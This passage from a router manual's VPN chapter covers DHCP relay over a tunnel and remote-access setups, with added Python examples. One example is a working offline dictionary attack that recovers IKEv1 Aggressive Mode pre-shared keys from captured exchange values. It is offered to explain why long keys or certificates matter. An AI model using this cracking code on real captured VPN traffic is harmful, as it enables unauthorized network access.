XSR User’s Guide 245
Chapter 11 VPN Applications
Configuring the Virtual Private Network
on the corporate network. In this application the XSR must act as a DHCP relay
agent (RFC 3046, which defines the Relay Agent Information option a relay may
add) to forward the branch hosts' DHCP requests for IP addresses across the
tunnel. An obvious limitation of this configuration is that hosts cannot obtain
IP addresses until a tunnel to the corporate network has been established. The
secure tunnel to the tunnel server is set up with an IETF ISAKMP (IKE) exchange,
either Aggressive Mode with pre-shared keys or Main Mode with certificates. Note
that Aggressive Mode sends the responder's authentication hash in the clear, so
with a pre-shared key an eavesdropper can test key guesses offline against a
captured exchange; use a long random pre-shared key, or prefer Main Mode with
certificates.
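The relay step described above, as an added example (not code from the XSR): it takes a constructed DHCPDISCOVER from a branch host, applies the relay agent rules of RFC 1542 (increment hops, set giaddr to the relay's own address on the first hop), inserts the RFC 3046 Relay Agent Information option (82) with a circuit ID, and refuses to forward anything while the tunnel is down, which is the limitation the text notes. The addresses, MAC and circuit ID are assumed values for illustration.

```python
"""DHCP relay agent handling for the branch-to-corporate case above.

Added illustration, not code from the XSR. Relay behaviour follows RFC 1542;
the Relay Agent Information option (82) follows RFC 3046. All packet values
are constructed.
"""
import ipaddress
import struct
from typing import List, Optional, Tuple

HDR_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # fixed BOOTP header, 236 bytes
MAGIC_COOKIE = b"\x63\x82\x53\x63"
BOOTREQUEST = 1
OPT_PAD, OPT_MSG_TYPE, OPT_RELAY_AGENT, OPT_END = 0, 53, 82, 255
DHCPDISCOVER = 1
SUBOPT_CIRCUIT_ID = 1


def build_discover(xid: int, mac: bytes) -> bytes:
    """Constructed DHCPDISCOVER as a branch host broadcasts it (giaddr = 0)."""
    hdr = struct.pack(
        HDR_FMT,
        BOOTREQUEST, 1, 6, 0,             # op, htype (Ethernet), hlen, hops
        xid, 0, 0x8000,                   # xid, secs, flags (broadcast bit set)
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,    # ciaddr yiaddr siaddr giaddr
        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128,  # chaddr, sname, file
    )
    return hdr + MAGIC_COOKIE + bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER, OPT_END])


def parse_options(opts: bytes) -> List[Tuple[int, bytes]]:
    """Walk the TLV option area; PAD is skipped, END terminates."""
    out, i = [], 0
    while i < len(opts):
        code = opts[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        length = opts[i + 1]
        out.append((code, opts[i + 2:i + 2 + length]))
        i += 2 + length
    return out


def relay(packet: bytes, relay_addr: str, circuit_id: bytes,
          tunnel_up: bool) -> Optional[bytes]:
    """Return the packet as it should go to the server, or None if dropped."""
    if not tunnel_up:
        return None                        # no path to the corporate DHCP server yet
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    f = list(struct.unpack(HDR_FMT, packet[:236]))
    if f[0] != BOOTREQUEST:
        raise ValueError("only client requests are relayed upstream here")
    if f[3] > 16:                          # RFC 1542 4.1.1: discard runaway relaying
        return None
    f[3] += 1                              # hops
    opts = parse_options(packet[240:])
    if f[10] == b"\0" * 4:                 # giaddr zero: we are the first relay hop
        f[10] = ipaddress.IPv4Address(relay_addr).packed
        # Only the hop that sets giaddr inserts option 82; later hops leave it alone.
        sub = bytes([SUBOPT_CIRCUIT_ID, len(circuit_id)]) + circuit_id
        opts.append((OPT_RELAY_AGENT, sub))
    body = b"".join(bytes([c, len(d)]) + d for c, d in opts) + bytes([OPT_END])
    return struct.pack(HDR_FMT, *f) + MAGIC_COOKIE + body
```

The server replies to giaddr, so the relay's address must be reachable through the tunnel and covered by a scope on the corporate DHCP server; the circuit ID in option 82 lets the server tie the lease to a particular branch interface.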
Remote Access Networks
In a Remote Access application, as shown in Figure 44, a client connects to the
corporate network in much the same way as a dial-in user does. First, the client
connects to an ISP and is assigned an external IP address, which is used to
route packets over the Internet.
Then the remote client initiates a tunnel to the XSR and is assigned an
internal IP address belonging to the corporate network. That internal address
can be drawn from a pool managed on the corporate network by a DHCP or RADIUS
server. Once connected, the remote client operates as if it were directly
attached to the corporate LAN.
Figure 44 VPN Remote Access Topology
Several protocols provide remote access functionality. Windows 95/98 supports
remote access using PPTP with MPPE; Windows 2000 supports L2TP over IPSec; and
proprietary solutions such as the Indus River Tunneling Protocol (IRTP, from
Enterasys Networks) are also available. PPTP derives its MPPE keys from the
user's MS-CHAP password authentication, so its strength is bounded by that
password; where the client supports it, prefer L2TP over IPSec.
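Remote access clients commonly use the IKE Aggressive Mode with pre-shared keys mentioned at the start of this section, because the client's ISP-assigned address is not known in advance and Main Mode with pre-shared keys needs the key looked up by peer address. The following is an added example (not code from the XSR or any client) showing why that combination needs a strong key: the responder's HASH_R is sent unencrypted in Aggressive Mode message 2, and every other input to it is also visible in messages 1 and 2, so a passive observer can test candidate keys offline. The formulas are from RFC 2409 section 5 with HMAC-SHA1 as the PRF; the cookies, nonces, SA payload, ID payload and Diffie-Hellman public values are constructed stand-in bytes (no real Diffie-Hellman is performed), and the pre-shared key and word list are assumed for illustration.

```python
"""Offline dictionary attack on IKEv1 Aggressive Mode with a pre-shared key.

Added illustration, not vendor code. Formulas: RFC 2409 section 5, PRF =
HMAC-SHA1. All exchange values are constructed stand-ins, not a real capture.
"""
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """Negotiated PRF; HMAC-SHA1 here."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """RFC 2409 5.4 (pre-shared key): SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b)


def hash_r(skeyid: bytes, c: Dict[str, bytes]) -> bytes:
    """RFC 2409 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, c["gxr"] + c["gxi"] + c["cky_r"] + c["cky_i"]
               + c["sai_b"] + c["idir_b"])


def stand_in(label: bytes, length: int) -> bytes:
    """Deterministic filler standing in for a nonce or DH public value (constructed)."""
    out = b""
    while len(out) < length:
        out += hashlib.sha256(label + bytes([len(out)])).digest()
    return out[:length]


def aggressive_mode_capture(psk: bytes) -> Dict[str, bytes]:
    """Everything a passive observer sees in Aggressive Mode messages 1 and 2."""
    c = {
        "cky_i": bytes.fromhex("0011223344556677"),          # initiator cookie
        "cky_r": bytes.fromhex("8899aabbccddeeff"),          # responder cookie
        # Initiator SA payload body (DOI, situation, proposal...); constructed bytes.
        "sai_b": bytes.fromhex("0000000100000001000000240101000003000000"),
        "gxi": stand_in(b"initiator-dh-public", 128),         # MODP group 2 size
        "gxr": stand_in(b"responder-dh-public", 128),
        "ni": stand_in(b"initiator-nonce", 20),
        "nr": stand_in(b"responder-nonce", 20),
        # IDir body: ID_IPV4_ADDR (1), protocol 0, port 0, then the gateway address.
        "idir_b": bytes([1, 0, 0, 0]) + bytes([192, 0, 2, 1]),
    }
    # The responder computes HASH_R with the real key and sends it in the clear.
    c["hash_r"] = hash_r(skeyid_psk(psk, c["ni"], c["nr"]), c)
    return c


def recover_psk(capture: Dict[str, bytes],
                candidates: Iterable[bytes]) -> Optional[bytes]:
    """Recompute HASH_R for each guess from the captured cleartext and compare."""
    for guess in candidates:
        sk = skeyid_psk(guess, capture["ni"], capture["nr"])
        if hmac.compare_digest(hash_r(sk, capture), capture["hash_r"]):
            return guess
    return None


if __name__ == "__main__":
    cap = aggressive_mode_capture(b"branch123")            # assumed weak key
    wordlist = [b"password", b"letmein", b"branch123", b"summer2003"]
    print("recovered:", recover_psk(cap, wordlist))
```

Each guess costs two HMAC-SHA1 computations, so a dictionary or short-key search is cheap. In Main Mode the same HASH_R is carried in message 6 under SKEYID_e encryption, and with certificate authentication there is no pre-shared key to recover, which is why the text pairs Main Mode with certificates.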
[Figure 44 labels: VPN tunnel across the Internet between the remote client and the XSR/VPN Gateway; external address assigned by the ISP; IP address assigned by the VPN Gateway; routing updates; corporate network with RADIUS server, DHCP server and application server]